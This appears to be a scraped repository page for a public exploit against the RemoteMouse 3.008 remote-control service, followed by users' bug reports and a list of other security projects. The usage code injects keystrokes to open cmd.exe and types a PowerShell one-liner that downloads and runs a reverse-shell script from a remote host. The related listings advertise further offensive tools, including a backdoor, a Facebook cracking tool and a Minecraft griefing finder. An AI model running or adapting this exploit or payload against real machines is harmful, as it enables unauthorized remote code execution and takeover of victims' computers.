This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Last update: Dec 04, 2022

Overview

RemoteMouse-3.008-Exploit

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

remotemouse = RemoteMouse(host=options.target_ip, verbose=options.verbose)

# Press Win + R
remotemouse._send_command(Keymap.KEY_WIN)

# Type cmd.exe
remotemouse.keyboard.press(Keymap.KEY_BACKSPACE)
remotemouse.keyboard.type("cmd.exe")
remotemouse.keyboard.press(Keymap.KEY_RETURN)

# Wait for cmd.exe to start
time.sleep(0.5)

# Payload
cmd = "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

# Send payload char by char
remotemouse.keyboard.type(cmd)

# Press enter to execute payload
remotemouse.keyboard.press(Keymap.KEY_WIN)

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/

Comments

unsupported operand type(s) Python 3.10.4

Hey,

I'm getting issues when running the exploit on Python 3.10.4. $ python3 Remote.py -v -t $IP

[cmd] Keymap.KEY_WIN
ERROR: a bytes-like object is required, not 'Keymap'
[cmd] key  3BASd
Traceback (most recent call last):
  File "/tmp/Remote.py", line 275, in <module>
    remotemouse.keyboard.type("cmd.exe")
  File "/tmp/Remote.py", line 171, in type
    self.press(character)
  File "/tmp/Remote.py", line 178, in press
    self.parent_remotemouse._send_command(self.charset[key] + "d")
TypeError: unsupported operand type(s) for +: 'Keymap' and 'str'

opened by Darktortue 1

the script is not running as expected
ISSUE

Using the provided RemoteMouse-3.008-Exploit.py AS-IS, will not work.

EXPECTED BEHAVIOR

I'm expecting the start menu to open and the cmd.exe to be written...

ACTUAL BEHAVIOR

Nothing opens or written

TROUBLESHOOTING

I've changed remotemouse._send_command(Keymap.KEY_WIN.value) to remotemouse.keyboard.press(Keymap.KEY_WIN)

now the start menu opens

I wanted to just test the typing functionality with remotemouse.keyboard.type("cmd.exe")

I opened a notepad with the cursor active on it, nothing happened.

ENVIRONMENT

source: Kali Linux

Python 3.9.12

target: Windows 10 (version 1709)
opened by bigoper 0
not sure why it's trying to enum a keymap
class Keymap(Enum):

File "./yeaboi.py", line 118, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.6/enum.py", line 92, in setitem raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'
opened by NAP3XD 0
Having issue when running the script

Hi P0dalirius,

This is an awsome exploit but i'm having some issues running it from my VM, are you able to advise as to why? I'm running ./remote -v -t $IP Traceback (most recent call last): File "/home**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 25, in <module> class Keymap(Enum): File "/home/**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 115, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.9/enum.py", line 133, in __setitem__ raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

opened by reshfi 0
Running exploit in slower networks leads to "not-in-order" output

Thanks for your well written exploit code, but I have one issue with the execution of it in worse network conditions than a local network. A good addition would be to add a configurable sleep between the keystrokes to make this issue less common.

Otherwise it would look like this:

opened by 1989gironimo 0

Releases(1.0)

1.0(Dec 17, 2021)

Source code(tar.gz)
Source code(zip)

Owner

Podalirius

Hacker of everything

GitHub Repository https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/

Python decompiler for Python 1.5-2.4 (for historical archive)

This preserves the early code of a Python decompiler for Python versions 1.5 to 2.4. I have been able to install this using pyenv using Python 2.3.7 u

2 Jan 04, 2022

Python implementation for PrintNightmare using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

141 Dec 31, 2022

Web-eyes - OSINT tools for website research

WEB-EYES V1.0 web-eyes: OSINT tools for website research, 14 research methods ar

8 Nov 10, 2022

Confluence Server Webwork OGNL injection

CVE-2021-26084 - Confluence Server Webwork OGNL injection An OGNL injection vulnerability exists that would allow an authenticated user and in some in

295 Jan 06, 2023

Static Token And Credential Scanner

Static Token And Credential Scanner What is it? STACS is a YARA powered static credential scanner which suports binary file formats, analysis of neste

81 Dec 27, 2022

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the conte

96 Dec 20, 2022

JavaScript Raider is a coverage-guided JavaScript fuzzing framework designed for the v8 JavaScript engine

105 Dec 05, 2022

SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Bad Blood Bad Blood is an exploit for CVE-2021-20038, a stack-based buffer overflow in the httpd binary of SMA-100 series systems using firmware versi

80 Dec 29, 2022

Fast Fb Cracking Tool

fb-brute Fast Fb Cracking Tool 🏆

8 Jun 29, 2022

AutoScan 有多个目标时，调用xray+rad进行自动扫描

Usage: 在高级版Xray和rad同目录下运行 python3 X-AutoXray.py xxxx.txt 写的蛮人性化的哦，os,linux,windows通用生成的xray报告会在当前目录的/result下面 Ctrl+c 打断脚本运行时还可以结算扫描进度，生成已扫描和未扫描的进度文件，

73 Jan 01, 2023

Uma ferramenta de segurança da informação escrita em python3,capaz de dar acesso total ao computador de alguém!

shell-reverse Uma ferramenta de segurança da informação escrita em python3, capaz de dar acesso total ao computador de alguém! A cybersecurity tool wr

1 Nov 03, 2021

Lite version of my Gatekeeper backdoor for public use.

Gatekeeper Lite Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning

56 Mar 25, 2022

Shell hunter for AF

AF-ShellHunter AF-ShellHunter: Auto shell lookup AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team How to pip3 ins

34 May 13, 2022

Search Shodan for Minecraft server IPs to grief

GriefBuddy This script searches Shodan for Minecraft server IPs to grief. This will return all servers connected to the public internet which Shodan h

26 Dec 29, 2022

Python DNS Lookup: The Domain Name System (DNS) is basically the phonebook of the Internet

-Python-DNS-Lookup- ✨ 🌟 Python DNS Lookup ✨ 🌟 The Domain Name System (DNS) is

2 Feb 14, 2022

Security tool to test different bypass of forbidden

notForbidden Security tool to test different bypass of forbidden Usage python3 notForbidden.py URL Features Bypass with different methods (POST, OPT

6 Sep 08, 2022

Statistical Random Number Generator Attack Against The Kirchhoff-law-johnson-noise (Kljn) Secure Key Exchange Protocol

1 Jan 13, 2022

Log4j2 intranet scan

Log4j2-intranet-scan ⚠️ 免责声明本项目仅面向合法授权的企业安全建设行为，在使用本项目进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权如您在使用本项目的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任在使用本项目前，请您务

16 Dec 19, 2022

DomainMonitor is a web project that has a RESTful API to get a domain's subdomains and whois data.

2 Feb 05, 2022

Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Some Attacks of Exchange SSRF This project is heavily replicated in ProxyShell, NtlmRelayToEWS https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag Get 1

129 Dec 30, 2022